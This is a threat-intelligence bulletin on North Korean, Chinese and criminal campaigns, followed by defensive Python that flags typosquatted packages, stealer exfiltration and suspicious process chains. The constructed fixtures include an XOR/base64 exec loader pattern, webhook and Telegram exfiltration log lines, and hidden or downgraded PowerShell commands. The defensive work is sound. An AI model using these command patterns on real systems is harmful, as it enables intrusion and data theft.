
Anomali Cyber Watch: Lazarus Typosquats on PyPI, Smishing Triad Impersonates Postal Services on iMessage, and More

Anomali Threat Research
September 6, 2023
<div id="weekly"> <p id="intro"> <p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics:<b> APT, Backdoors, China, North Korea, Remote access trojans, Smishing, Spearphishing, </b>and <b>Typosquatting</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. <img alt="ACW IOCs Summary Charts" src="https://cdn.filestackcontent.com/EPdr8NGQpG4I9C583qGA"/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b> </p> <div class="trending-threats-article" id="trending-threats"> <h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2> <h3 id="article-1"><a href="https://interlab.or.kr/archives/19416" target="_blank">Novel RAT Discovered “SuperBear” Targeting Journalist Covering Geopolitics of Asia</a></h3> <p>(published: September 1, 2023)</p> <p> A new remote access trojan (RAT) dubbed SuperBear has been discovered by Interlab researchers. The incident was attributed, with low confidence, to the North Korea-sponsored Kimsuky group. It likely targets journalists and civil society groups in South Korea, and possibly more broadly. Initial compromise came through a malicious .LNK file posing as a document, emailed to a journalist by someone impersonating a member of an activist organization. When opened, the LNK file launched a PowerShell command, which in turn executed a Visual Basic script. That script fetched payloads from a compromised WordPress website, including a binary and an AutoIt script. The AutoIt script performed process injection via process hollowing: it started a legitimate process in a suspended state and replaced its code with the malicious payload. The SuperBear RAT connects to a C2 server and supports exfiltrating process and system data, downloading and executing a shell command, and downloading and running a DLL. 
<br/> <b>Analyst Comment:</b> Spearphishing emails and activist impersonation remain popular tactics among state-sponsored groups. Journalists should weigh the risk and avoid opening risky attachments such as LNK files. All known indicators associated with the SuperBear sample are available in the Anomali platform and customers are advised to block these on their infrastructure. This incident and other Advisory, News and Blog sources were made available in Anomali ThreatStream as RSS feeds, and for AutoLens+ subscribers these are also tagged and summarized.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10001" target="_blank">[MITRE ATT&amp;CK] T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9920" target="_blank">[MITRE ATT&amp;CK] T1055.012 - Process Injection: Process Hollowing</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/9853" target="_blank">[MITRE ATT&amp;CK] T1059.005 - Command and Scripting Interpreter: Visual Basic</a> | <a href="https://ui.threatstream.com/attackpattern/10048" target="_blank">[MITRE ATT&amp;CK] T1584 - Compromise Infrastructure</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a><br/> <b>Tags:</b> malware:SuperBear, malware-type:RAT, target-country:KR, source-country:KP, target-industry:Media, target-industry:Information, technique:PowerShell, technique:Process hollowing, language:AutoIT, 
language:VBS, file-type:AU3, file-type:EXE, file-type:LNK, file-type:PDB, target-system:Windows </p> <h3 id="article-1"><a href="https://www.reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues" target="_blank">VMConnect Supply Chain Attack Continues, Evidence Points to North Korea</a></h3> <p>(published: August 31, 2023)</p> <p> The North Korea-sponsored Lazarus Group has been identified as the actor behind a malicious campaign against the Python Package Index (PyPI). ReversingLabs dubbed the campaign VMConnect because Lazarus has been uploading malicious packages that impersonate popular software projects, including a VMware vSphere connector module named vConnector. The packages were downloaded hundreds of times before they were removed. Each contained a file that collected data from the infected machine and sent it to the attackers' command-and-control servers. Lazarus employed several detection-evasion techniques, including encryption, endless loops, obfuscation, and running the malicious payload only once the package had been imported and called by a legitimate application.<br/> <b>Analyst Comment:</b> Developers should be trained to recognize typosquatting and other impersonation attacks. Organizations should vet any open-source or proprietary code for suspicious or malicious indicators, including hidden (obfuscated) functionality and unexplained communication with third-party infrastructure. 
All known network indicators associated with the VMConnect campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/10000" target="_blank">[MITRE ATT&amp;CK] T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9715" target="_blank">[MITRE ATT&amp;CK] T1071.001 - Application Layer Protocol: Web Protocols</a><br/> <b>Tags:</b> actor:Lazarus Group, actor:DangerousPassword, actor:Labyrinth Chollima, source-country:KP, technique:Package typosquatting, campaign:VMConnect, threat-type:Software supply chain, abused:PyPI, abused:Base64, abused:XOR </p> <h3 id="article-1"><a href="https://blog.talosintelligence.com/sapphirestealer-goes-open-source/" target="_blank">SapphireStealer: Open-Source Information Stealer Enables Credential and Data Theft</a></h3> <p>(published: August 31, 2023)</p> <p> SapphireStealer, an open-source information stealer, has been a growing threat since its release on GitHub in December 2022. In January 2023, the 0day2 account behind the initial SapphireStealer release published another .NET malware, FUD-Loader, which some SapphireStealer users have folded into their infostealer delivery chain. SapphireStealer gathers host information, takes screenshots, harvests cached browser credentials, and collects files with predefined extensions. 
The stolen data is then compressed and sent to the attacker via SMTP. Different threat actors have made notable modifications to SapphireStealer, including exfiltration through the Discord webhook API and the Telegram posting API.<br/> <b>Analyst Comment:</b> Readily available open-source malware is dangerous because it lowers the barrier to entry and enables rapid evolution and a wide variety of infection chains. All known indicators associated with recent SapphireStealer campaigns are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10025" target="_blank">[MITRE ATT&amp;CK] T1555.003 - Credentials from Password Stores: Credentials From Web Browsers</a> | <a href="https://ui.threatstream.com/attackpattern/13021" target="_blank">[MITRE ATT&amp;CK] Picus: The System Information Discovery Technique Explained - MITRE ATT&amp;CK T1082</a> | <a href="https://ui.threatstream.com/attackpattern/9671" target="_blank">[MITRE ATT&amp;CK] T1113 - Screen Capture</a> | <a href="https://ui.threatstream.com/attackpattern/3708" target="_blank">[MITRE ATT&amp;CK] T1005: Data from Local System</a> | <a href="https://ui.threatstream.com/attackpattern/9710" target="_blank">[MITRE ATT&amp;CK] T1057 - Process Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9950" target="_blank">[MITRE ATT&amp;CK] T1489 - Service Stop</a> | <a href="https://ui.threatstream.com/attackpattern/9693" target="_blank">[MITRE ATT&amp;CK] T1560.001 - Archive Collected Data: Archive Via Utility</a> | <a href="https://ui.threatstream.com/attackpattern/9742" target="_blank">[MITRE ATT&amp;CK] T1048 - Exfiltration Over Alternative Protocol</a> | <a href="https://ui.threatstream.com/attackpattern/9983" target="_blank">[MITRE ATT&amp;CK] T1016 - System Network Configuration Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9770" target="_blank">[MITRE 
ATT&amp;CK] T1070.004 - Indicator Removal on Host: File Deletion</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9746" target="_blank">[MITRE ATT&amp;CK] T1567 - Exfiltration Over Web Service</a><br/> <b>Tags:</b> malware:SapphireStealer, malware-type:Infostealer, threat-type:Open-source, malware:FUD-Loader, malware-type:Downloader, actor:0day2, actor:romanmaslov200, abused:Discord webhook API, abused:Telegram posting API, language:.NET, file-type:EXE, target-system:Windows </p> <h3 id="article-1"><a href="https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html" target="_blank">Earth Estries Targets Government, Tech for Cyberespionage</a></h3> <p>(published: August 30, 2023)</p> <p> Trend Micro researchers have uncovered activity by a cyberespionage group dubbed Earth Estries that has been operating since at least 2020. The group targets government and technology organizations in Germany, Malaysia, the Philippines, South Africa, Taiwan, and the US, using tactics such as PowerShell downgrade attacks and the compromise of accounts with administrative privileges. It deploys Cobalt Strike, Meterpreter, and PlugX to move through victim networks, focusing on the theft of PDF and DDF files. Its own toolkit includes the heavily obfuscated HTTP backdoor Zingdoor, an information stealer called TrillClient, and HemiGate, another backdoor executed via DLL sideloading. 
The group uses multiple domains for its command-and-control (C2) infrastructure and often fronts them with content delivery networks (CDNs) to hide its real IP addresses.<br/> <b>Analyst Comment:</b> Earth Estries relies heavily on DLL sideloading through older versions of legitimate executables, which makes version control of approved binaries and application baselining all the more important. All known indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9700" target="_blank">[MITRE ATT&amp;CK] T1087 - Account Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9873" target="_blank">[MITRE ATT&amp;CK] T1482 - Domain Trust Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/23579" target="_blank">[MITRE ATT&amp;CK] Picus: T1047 Windows Management Instrumentation of the MITRE ATT&amp;CK Framework</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/3718" target="_blank">[MITRE ATT&amp;CK] T1569.002: Service Execution</a> | <a href="https://ui.threatstream.com/attackpattern/9647" target="_blank">[MITRE ATT&amp;CK] T1021.002 - Remote Services: Smb/Windows Admin Shares</a> | <a href="https://ui.threatstream.com/attackpattern/10104" target="_blank">[MITRE ATT&amp;CK] T1574.002 - Hijack Execution Flow: Dll Side-Loading</a> | <a href="https://ui.threatstream.com/attackpattern/9592" target="_blank">[MITRE ATT&amp;CK] T1027.002 - Obfuscated Files or Information: Software Packing</a> | <a href="https://ui.threatstream.com/attackpattern/10101" target="_blank">[MITRE ATT&amp;CK] T1036.004 - Masquerading: Masquerade Task Or Service</a> | <a href="https://ui.threatstream.com/attackpattern/10081" target="_blank">[MITRE ATT&amp;CK] T1036.005 - Masquerading: Match 
Legitimate Name Or Location</a> | <a href="https://ui.threatstream.com/attackpattern/9767" target="_blank">[MITRE ATT&amp;CK] T1070 - Indicator Removal On Host</a> | <a href="https://ui.threatstream.com/attackpattern/12872" target="_blank">[MITRE ATT&amp;CK] T1562.010 - Impair Defenses: Downgrade Attack</a> | <a href="https://ui.threatstream.com/attackpattern/9719" target="_blank">[MITRE ATT&amp;CK] T1134.001 - Access Token Manipulation: Token Impersonation/Theft</a> | <a href="https://ui.threatstream.com/attackpattern/9931" target="_blank">[MITRE ATT&amp;CK] T1053.005 - Scheduled Task/Job: Scheduled Task</a> | <a href="https://ui.threatstream.com/attackpattern/9933" target="_blank">[MITRE ATT&amp;CK] T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</a> | <a href="https://ui.threatstream.com/attackpattern/9860" target="_blank">[MITRE ATT&amp;CK] T1543.003 - Create or Modify System Process: Windows Service</a> | <a href="https://ui.threatstream.com/attackpattern/10104" target="_blank">[MITRE ATT&amp;CK] T1574.002 - Hijack Execution Flow: Dll Side-Loading</a> | <a href="https://ui.threatstream.com/attackpattern/9870" target="_blank">[MITRE ATT&amp;CK] T1078 - Valid Accounts</a> | <a href="https://ui.threatstream.com/attackpattern/9693" target="_blank">[MITRE ATT&amp;CK] T1560.001 - Archive Collected Data: Archive Via Utility</a> | <a href="https://ui.threatstream.com/attackpattern/9888" target="_blank">[MITRE ATT&amp;CK] T1056.001 - Input Capture: Keylogging</a> | <a href="https://ui.threatstream.com/attackpattern/9671" target="_blank">[MITRE ATT&amp;CK] T1113 - Screen Capture</a> | <a href="https://ui.threatstream.com/attackpattern/9715" target="_blank">[MITRE ATT&amp;CK] T1071.001 - Application Layer Protocol: Web Protocols</a> | <a href="https://ui.threatstream.com/attackpattern/9891" target="_blank">[MITRE ATT&amp;CK] T1071.004 - Application Layer Protocol: Dns</a> | <a href="https://ui.threatstream.com/attackpattern/9748" 
target="_blank">[MITRE ATT&amp;CK] T1567.002 - Exfiltration Over Web Service: Exfiltration To Cloud Storage</a><br/> <b>Tags:</b> actor:Earth Estries, actor:FamousSparrow, malware:Cobalt Strike, detection:Trojan.Win64.COBEACON, malware:PlugX, malware:Meterpreter, malware:Zingdoor, detection:Backdoor.Win32.ZINGDOOR, detection:Backdoor.Win64.ZINGDOOR, malware:HemiGate, malware-type:Backdoor, detection:Backdoor.Win32.HEMIGATE, detection:Trojan.Win64.DRACULOADER, malware:TrillClient, malware-type:Infostealer, detection:Trojan.Win64.TRILLCLIENT, detection:Trojan.Win32.TRILLINSTALLER, target-industry:Government, target-industry:Tech, threat-type:Cyberespionage, technique:PowerShell downgrade, technique:AMSI bypass, abused:Github, abused:Gmail, abused:AnonFiles, abused:Fastly CDN, abused:File-io, target-country:PH, target-country:TW, target-country:MY, target-country:ZA, target-country:DE, target-country:US, language:Golang, cs-watermark:2029527128, file-type:CAB, file-type:DLL, file-type:EXE, target-system:Windows </p> <h3 id="article-1"><a href="https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft" target="_blank">"Smishing Triad" Targeted USPS and US Citizens for Data Theft</a></h3> <p>(published: August 30, 2023)</p> <p> A China-based cybercriminal group dubbed Smishing Triad has been conducting large-scale smishing campaigns against users in Indonesia, Italy, Japan, Poland, Sweden, the UK, the US, and other countries. The group mostly impersonates postal and delivery services and sends package-tracking scam texts as iMessages from compromised Apple iCloud accounts, aiming to harvest personally identifiable information (PII) and payment credentials. Its latest campaign, analyzed by Resecurity researchers, targeted US citizens with USPS-themed messages. Other Smishing Triad activity includes compromising online-shopping platforms with injected malicious code that intercepts customer data, and selling smishing kits through Telegram groups. 
Researchers have also identified a cluster of Vietnamese-speaking actors as affiliates of the Smishing Triad fraud-as-a-service network. Resecurity has identified at least 108,044 records of compromised victim data.<br/> <b>Analyst Comment:</b> Users should not click unsolicited tracking links and should check their banking statements regularly for suspicious transactions. Anyone receiving a smishing message may report it to the appropriate authorities: take a screenshot or copy the body of the message without clicking the link. All known network indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10041" target="_blank">[MITRE ATT&amp;CK] T1583.001 - Acquire Infrastructure: Domains</a> | <a href="https://ui.threatstream.com/attackpattern/10048" target="_blank">[MITRE ATT&amp;CK] T1584 - Compromise Infrastructure</a> | <a href="https://ui.threatstream.com/attackpattern/10028" target="_blank">[MITRE ATT&amp;CK] T1566.002 - Phishing: Spearphishing Link</a><br/> <b>Tags:</b> actor:Smishing Triad, actor:wangduoyu8, actor:dy_tongbu, target-organization:USPS, target-country:US, source-country:CN, source-country:VN, threat-type:Data Theft, technique:Smishing, technique:SQL injection, abused:iMessages, target-system:Apple iCloud, threat-type:Fraud-as-a-service </p> </div> </p></div>
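Worked example for the VMConnect item above. The two checks a developer pipeline can run before `pip install` are the ones the ReversingLabs summary implies: is the requested package name a near-miss of a dependency we actually use, and does the module source decode and `exec()` hidden data, loop on XOR, carry a large base64 literal, or stall in a sleep loop. This is an added example, not code from ReversingLabs, Anomali, or any package in the campaign; the `KNOWN_GOOD` allowlist and both module bodies are constructed for illustration.

```python
"""Pre-install checks for PyPI typosquatting and payload obfuscation.
Added example; KNOWN_GOOD and the two module bodies are constructed."""
import ast
import re

# Constructed allowlist. In practice derive it from your lock file or internal mirror.
KNOWN_GOOD = {"requests", "pyvmomi", "cryptography", "urllib3", "pyyaml", "boto3"}


def normalize(name):
    """PEP 503 name normalization: lowercase, runs of '-', '_' and '.' become one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    """Optimal string alignment distance: Levenshtein plus adjacent transposition,
    so 'reqeusts' is one edit from 'requests' rather than two."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(requested, known_good=KNOWN_GOOD, max_distance=1):
    """Map each requested name that is NOT allowlisted but sits within max_distance
    edits of an allowlisted name to the name it resembles. Short allowlist names
    are skipped: 'six' vs 'sit' is noise, not a typosquat."""
    known = {normalize(k) for k in known_good}
    hits = {}
    for name in requested:
        n = normalize(name)
        if n in known:
            continue
        for k in sorted(known):
            if len(k) >= 5 and osa_distance(n, k) <= max_distance:
                hits[name] = k
                break
    return hits


B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")


def scan_source(src):
    """Static tells for the evasion described in the write-up: exec()/eval() of
    data computed at runtime, XOR decode loops, large base64 literals and
    sleep-forever stall loops. Returns (rule, line) pairs sorted by line; the
    module is parsed, never imported or run."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval")
                and node.args and not isinstance(node.args[0], ast.Constant)):
            findings.append(("exec_of_computed_data", node.lineno))
        elif isinstance(node, (ast.GeneratorExp, ast.ListComp, ast.For)) and any(
                isinstance(n, ast.BinOp) and isinstance(n.op, ast.BitXor) for n in ast.walk(node)):
            findings.append(("xor_decode_loop", node.lineno))
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
                and B64_LITERAL.match(node.value)):
            findings.append(("large_base64_literal", node.lineno))
        elif (isinstance(node, ast.While) and isinstance(node.test, ast.Constant)
                and node.test.value is True and any(
                    isinstance(n, ast.Call) and ast.unparse(n.func) == "time.sleep"
                    for n in ast.walk(node))):
            findings.append(("stall_loop", node.lineno))
    return sorted(findings, key=lambda f: f[1])


# Constructed module bodies: one shaped like the pattern described, one ordinary.
SUSPECT_MODULE = '''import base64, time
while True:
    time.sleep(300)
    break
key = 0x5a
blob = "%s"
data = bytes(b ^ key for b in base64.b64decode(blob))
exec(data.decode())
''' % ("QUJD" * 60)

BENIGN_MODULE = '''import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    print(typosquat_candidates(["requestz", "boto3", "crypt0graphy", "urlib3", "reqeusts"]))
    print(scan_source(SUSPECT_MODULE), scan_source(BENIGN_MODULE))
```

Both checks are heuristics, not verdicts: a distance-1 hit should trigger a human look at the publisher, release history and download counts, and the source scan will flag legitimate XOR checksums or embedded certificates. Their value is that they run in seconds on a pull request, before any `setup.py` or `__init__.py` from the package has executed on a developer machine.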
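Worked example for the SapphireStealer item above. The summary names three exfiltration paths (SMTP, the Discord webhook API and the Telegram Bot API), and each leaves a distinct shape in egress logs: a workstation speaking SMTP to anything other than the corporate relay, a POST to `discord.com/api/webhooks/<id>/<token>`, and a call to `api.telegram.org/bot<token>/send...`. This is an added example, not code from Cisco Talos or Anomali; the log format, the `10.20.4.0/22` workstation subnet, the `10.20.0.25` relay address and every log line are constructed.

```python
"""Egress-log detections for the three SapphireStealer exfiltration paths.
Added example; format, subnet, relay and log lines are constructed."""
import ipaddress
import re
from collections import namedtuple

WORKSTATIONS = ipaddress.ip_network("10.20.4.0/22")     # constructed user subnet
MAIL_RELAYS = {ipaddress.ip_address("10.20.0.25")}       # constructed: only host allowed to speak SMTP out
SMTP_PORTS = {25, 465, 587}
DISCORD_WEBHOOK = re.compile(r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)")
TELEGRAM_BOT = re.compile(r"https?://api\.telegram\.org/bot(\d+):([\w-]+)/(send\w+)")

# Constructed egress log: ts host src dst dst_port method url status bytes_out
# ("-" where a field does not apply, e.g. raw SMTP connections).
LOG = """\
2023-08-31T10:02:11Z ws-017 10.20.4.17 192.0.2.10 443 POST https://discord.com/api/webhooks/112233445566778899/AbCdEfGhIjKlMnOpQrStUvWxYz0123456789 204 184233
2023-08-31T10:03:40Z ws-022 10.20.4.22 192.0.2.20 443 POST https://api.telegram.org/bot7000000000:AAH-constructedtoken_0123456789abcdef/sendDocument 200 96411
2023-08-31T10:04:05Z ws-031 10.20.4.31 203.0.113.25 587 - - - 52100
2023-08-31T10:05:12Z ws-031 10.20.4.31 10.20.0.25 587 - - - 2048
2023-08-31T10:06:00Z ws-017 10.20.4.17 192.0.2.10 443 GET https://discord.com/api/v9/users/@me 200 512
2023-08-31T10:07:30Z srv-mail 10.20.0.25 198.51.100.10 25 - - - 88000
"""

Record = namedtuple("Record", "ts host src dst port method url status bytes_out")


def parse(line):
    f = line.split()
    return Record(f[0], f[1], ipaddress.ip_address(f[2]), ipaddress.ip_address(f[3]),
                  int(f[4]), f[5], f[6], f[7], int(f[8]))


def redact(token):
    """Webhook and bot tokens are live credentials for the attacker's drop:
    keep enough to correlate alerts, never paste the whole thing into a ticket."""
    return token[:4] + "..." + token[-4:]


def detect_exfil(lines):
    """Return (rule, host, detail) for every line matching one of the three patterns."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        r = parse(line)
        m = DISCORD_WEBHOOK.search(r.url)
        if r.method == "POST" and m:            # ordinary Discord client traffic never hits /api/webhooks/
            findings.append(("discord_webhook_post", r.host,
                             "webhook %s token %s" % (m.group(1), redact(m.group(2)))))
        m = TELEGRAM_BOT.search(r.url)
        if m:                                   # bot API path carries the bot token itself
            findings.append(("telegram_bot_api", r.host,
                             "bot %s %s token %s" % (m.group(1), m.group(3), redact(m.group(2)))))
        # Legitimate mail leaves via the relay; a workstation talking SMTP to
        # anything else is the stealer's default path.
        if r.port in SMTP_PORTS and r.src in WORKSTATIONS and r.dst not in MAIL_RELAYS:
            findings.append(("direct_smtp_from_workstation", r.host,
                             "%s:%d %d bytes out" % (r.dst, r.port, r.bytes_out)))
    return findings


if __name__ == "__main__":
    for f in detect_exfil(LOG.splitlines()):
        print(*f)
```

The two URL rules assume the proxy sees the path, which means TLS inspection or an explicit forward proxy; with SNI-only visibility, fall back to volume-based rules on POSTs to `discord.com` and `api.telegram.org` from hosts that have no business reason to talk to them. The SMTP rule is the cheapest of the three and needs only flow data, but it depends on the relay allowlist being complete.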
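Worked example covering two items above: the SuperBear launch chain (LNK opened from Explorer, hidden PowerShell, Windows Script Host, then the AutoIt interpreter that performs the hollowing) and the PowerShell downgrade attack attributed to Earth Estries (T1562.010, requesting the v2 engine, which has no AMSI or script block logging). The hollowing step itself needs memory or ETW telemetry; what process-creation events give you is the chain that leads to it, and that is what this code checks. This is an added example, not code from Interlab, Trend Micro or Anomali; the events are constructed Sysmon-style process-creation records, not telemetry from either intrusion.

```python
"""Process-tree detections for the SuperBear launch chain and PowerShell
downgrade. Added example; EVENTS are constructed, not real telemetry."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# -v 2 / -Version 2.0: asks for the v2 engine, which lacks AMSI and script block logging.
DOWNGRADE_RE = re.compile(r"(?:^|\s)-v(?:ersion)?\s+2(?:\.0)?\b", re.I)
# Switches an interactive user rarely types but LNK payloads almost always use.
STEALTH_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|-nop\b", re.I)

# Constructed events: pids 200-400 mirror the SuperBear-style chain, 500-600 a
# downgrade launched via cmd.exe, 700-800 ordinary admin activity that must not fire.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -nop -w hidden -c "Start-Process wscript.exe $env:TEMP\stage.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\j\AppData\Local\Temp\stage.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\j\AppData\Local\Temp\AutoIt3.exe",
     "cmdline": r"AutoIt3.exe C:\Users\j\AppData\Local\Temp\stage.au3"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell -Version 2 -ExecutionPolicy Bypass -File C:\Temp\x.ps1"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -Version 2 -ExecutionPolicy Bypass -File C:\Temp\x.ps1"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\fileserver\netlogon\logon.vbs"},
]


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lineage(events, pid):
    """Image names from the root ancestor down to pid, for the analyst's write-up."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # 'seen' guards against pid reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect_process_chains(events):
    """Return (rule, pid) for each event matching one of four rules."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        if img == "powershell.exe" and DOWNGRADE_RE.search(cmd):
            findings.append(("powershell_downgrade", e["pid"]))
        if img == "powershell.exe" and pimg == "explorer.exe" and STEALTH_RE.search(cmd):
            findings.append(("hidden_powershell_from_explorer", e["pid"]))
        if img in SCRIPT_HOSTS and pimg == "powershell.exe":
            findings.append(("script_host_from_powershell", e["pid"]))
        # Image-name match only; a renamed AutoIt3 interpreter needs a hash or signer check instead.
        if img == "autoit3.exe" and pimg in SCRIPT_HOSTS:
            findings.append(("autoit_from_script_host", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect_process_chains(EVENTS):
        print(rule, pid, " -> ".join(lineage(EVENTS, pid)))
```

Two caveats a practitioner would want: the downgrade rule keys on the PowerShell image, so the `cmd.exe /c powershell -Version 2 ...` wrapper at pid 500 is only caught through its child at pid 600; and the chain rules deliberately ignore a logon script run from Explorer (pid 800), since that is what WSH is legitimately for. Pair these with blocking or removing the PowerShell 2.0 engine feature so the downgrade fails rather than merely alerts.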
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Discover More About Anomali

Get the latest news about Anomali's Security and IT Operations platform,

SEe all Resources
No items found.
No items found.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

September 6, 2023
-
Anomali Threat Research
,

Anomali Cyber Watch: Lazarus Typosquats on PyPI, Smishing Triad Impersonates Postal Services on iMessage, and More

<div id="weekly"> <p id="intro"> <p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics:<b> APT, Backdoors, China, North Korea, Remote access trojans, Smishing, Spearphishing, </b>and <b>Typosquatting</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. <img alt="ACW IOCs Summary Charts" src="https://cdn.filestackcontent.com/EPdr8NGQpG4I9C583qGA"/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b> </p> <div class="trending-threats-article" id="trending-threats"> <h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2> <h3 id="article-1"><a href="https://interlab.or.kr/archives/19416" target="_blank">Novel RAT Discovered “SuperBear” Targeting Journalist Covering Geopolitics of Asia</a></h3> <p>(published: September 1, 2023)</p> <p> A new remote access trojan (RAT) dubbed SuperBear has been discovered by Interlab researchers. This incident was attributed with low confidence to the North Korea-sponsored Kimsuky group. It is likely targeting journalists and civil society groups in South Korea, or broader. The initial compromise was made through a malicious .LNK document sent to a journalist via email, impersonating a member of an activist organization. Upon execution, the document loaded a PowerShell command, which then executed a Visual Basic script. This script fetched payloads from a compromised WordPress website, including a binary and an AutoIt script. The script performed process injection using a process hollowing technique, injecting malicious code into a suspended process. The SuperBear RAT connects to a C2 server and performs various attack operations including exfiltrating process and system data, downloading and executing a shell command, and downloading and running a DLL. 
